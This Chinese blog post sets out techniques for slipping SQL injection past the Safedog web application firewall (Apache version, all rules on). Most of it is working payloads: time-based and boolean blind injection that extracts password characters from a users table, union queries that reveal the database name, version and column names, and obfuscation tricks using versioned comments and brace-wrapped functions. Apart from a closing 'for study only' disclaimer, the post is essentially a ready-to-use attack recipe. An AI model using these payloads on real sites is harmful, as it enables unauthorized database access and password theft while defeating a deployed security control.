过安全狗waf注入方法技巧

  • 内容
  • 相关

120.jpg

前提

web页面存在注入漏洞

环境

安全狗(APACE版)V4.0 防护规则全开



绕过

1. 延时盲注


https://www.0dayhack.com/test.php?id=2' and if(substring((select password from (blog.users) where id=2 limit 1 offset 0),2,1)>1,sleep(5 ),1)–+


2. 布尔盲注


https://www.0dayhack.com/test.php?id=2' and substring((select password from (blog.users) where id=2 limit 1 offset 0),2,1)>1–+


3. 查库名/用户名


https://www.0dayhack.com/test.php?id=2'union/*!40000DISTINCT*/(/*!40000select*/1,(/*!40000database*/()),3)– -


4. 查版本

https://www.0dayhack.com/test.php?id=2'union/*!40000DISTINCT*/(/*!40000select*/1,{/*!f*/version()},3)– -


5. 联合查询


https://www.0dayhack.com/test.php?id=-1'union /*!40000DISTINCT*/(/*!40000select*/1,(select group_concat(column_name) from (information_schema.columns) where table_name='users'),3)– -


技巧

1. 
union select 1,2,3 => union/*!40000DISTINCT*/(/*!40000select*/1,2,3)
2.
select password from => select password*1.from user => select password from (user)
3.
version() => {/*!f*/version()} 


本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:过安全狗waf注入方法技巧 - https://www.0dayhack.com/post-778.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注